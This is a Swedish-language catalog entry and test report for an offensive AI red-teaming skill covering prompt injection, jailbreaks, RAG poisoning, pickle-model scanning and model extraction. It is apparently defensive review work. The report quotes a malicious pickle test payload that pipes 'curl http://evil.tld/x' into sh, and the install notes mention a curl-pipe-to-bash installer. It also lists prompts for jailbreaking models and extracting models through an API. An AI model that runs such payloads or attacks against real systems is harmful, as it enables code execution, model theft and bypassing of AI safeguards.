AI Security

Offensiv testning av LLM/ML-system: prompt injection, RAG poisoning, pickle-model scanning

av hypnguyen1209 · hypnguyen1209/offensive-claude

Testad · Fungerar ★ 9.2/10

AI Security — Offensiv testning av LLM/ML-system: prompt injection, RAG poisoning, pickle-model scanning

Vad den gör

En offensiv säkerhetsfärdighet för red-teaming av AI/ML-system: prompt-injection och multi-turn jailbreak-batterier, RAG/vector-DB poisoning, MCP/agent tool-poisoning-revisioner, pre-load pickle-model malware scanning, och black-box model extraction/membership-inference-sonder, med OWASP LLM Top-10 och MITRE ATLAS-mappningar. Utlöses när en användare ber att attackera, red-teama eller granska en LLM, chatbot, RAG-pipeline, MCP-server eller en nedladdad modellartefakt. Levereras med fem körbara Python-skript plus fem referensdjupdykningar kopplade till specifika 2024-2025 CVEs.

Testrapport

Hämtade skills/ai-security/SKILL.md och kontrollerade 3 medföljande filer (promptinject_harness.py, rag_poisoner.py, prompt-injection-jailbreak.md) — alla HTTP 200. För UTDATA körde jag färdighetens stdlib-only scripts/model_scan.py mot pickles jag skapade: en skadlig med __reduce__ -> os.system("curl http://evil.tld/x | sh"), en godartad, och en godartad vars data endast innehöll strängarna "operating_system"/"subprocess". Baslinjen (naiv byte-grep) flaggade den skadliga filen men FALSE-POSITIVED även den godartade etikettlistfilen. Färdigheten demonterade pickle-opkoder via pickletools, löste posix.system genom REDUCE-reachability som en nekad anropsbar (strukturerad JSONL: severity high, CWE-502, AML.T0011, exit code 2 som en CI-gate), och rensade korrekt båda godartade filerna. Verifierad installation i en ren mktemp HOME placerar SKILL.md på ~/.claude/skills/ai-security/SKILL.md.

Testad: 2026-07-31 · Claude Code 2.x (agent harness)

Installation

git clone --depth 1 https://github.com/hypnguyen1209/offensive-claude.git /tmp/ai-security-src
mkdir -p ~/.claude/skills
cp -R /tmp/ai-security-src/skills/ai-security ~/.claude/skills/ai-security
# Verifies at ~/.claude/skills/ai-security/SKILL.md (bundles references/ + scripts/).
# Script deps vary: model_scan.py is stdlib-only; rag_poisoner.py needs sentence-transformers;
#   promptinject_harness.py + model_extractor.py need `pip install requests` and a live target endpoint.
# Repo-level plugin alternative (registers a SessionStart dispatcher hook — not needed for this skill alone):
#   /plugin marketplace add hypnguyen1209/offensive-claude
#   /plugin install offensive-claude@offensive-claude-marketplace
# NOTE: the README also offers `curl -sL .../install.sh | bash` — a curl|sh pipe; the manual cp above avoids it.

Kommandon och exempelprompter

  • /ai-securityOffensiv testning av LLM/ML-system: prompt injection, RAG poisoning, pickle-model scanning

Skills triggas av vanliga förfrågningar — inga kommandon att memorera. Efter installationen aktiverar prompter som dessa skillen (på engelska):

  • Test this model against known jailbreak techniques
  • Check this RAG pipeline for vector poisoning
  • Run a model extraction attack against this API